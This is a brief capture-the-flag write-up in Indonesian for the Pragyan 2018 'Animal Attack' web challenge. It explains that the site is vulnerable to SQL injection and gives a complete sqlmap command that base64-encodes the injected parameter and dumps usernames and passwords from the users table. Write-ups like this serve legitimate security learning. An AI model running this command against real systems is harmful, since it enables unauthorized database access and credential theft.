Pragyan 2018 - Animal Attack (200 Points)
Masalah
Animals have taken over our world and a specific team of animal spies have taken the role of leading the entire army of animals. We humans have formed a group of rebels who have taken it up as a mission to find the main users of the animal spies and find the admin of that group. The admin, with his username and password can launch a powerful attack on the humans. Help the human rebels group get the world back from the animals.
The portal is available at :- http://128.199.224.175:24000/
Penyelesaian
Situs ini memiliki kelemahan SQL Injection, namun pada saat melakukan injeksi query UNION tidak bisa dimasukkan. Untuk penyelesaiannya bisa menggunakan SQLMap dan tambahan script Python.
python sqlmap.py -r ../req.raw -p spy_name --eval "import base64; spy_name = base64.b64encode(spy_name)" --dbms=mysql --random-agent --level=5 --risk=3 --threads 10 -D spy_database -T users -C username,password --dump